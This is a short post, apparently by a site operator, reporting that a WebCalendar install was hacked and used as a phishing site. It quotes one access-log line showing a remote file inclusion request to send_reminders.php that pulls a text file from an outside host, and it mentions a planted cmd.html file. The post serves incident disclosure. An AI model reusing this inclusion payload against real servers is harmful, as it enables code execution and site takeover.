After finding these entries in the logfile and finding a cmd.html-file in this directory, I was disconnected because I was working as a phishing-site. "POST /WebCalendar/tools/send_reminders.php?includedir=http://65.xxx.xx.xxx/dir/a.txt? HTTP/1.1" 200 7315 In other words, the attacker has improved his actions. More files are available on request.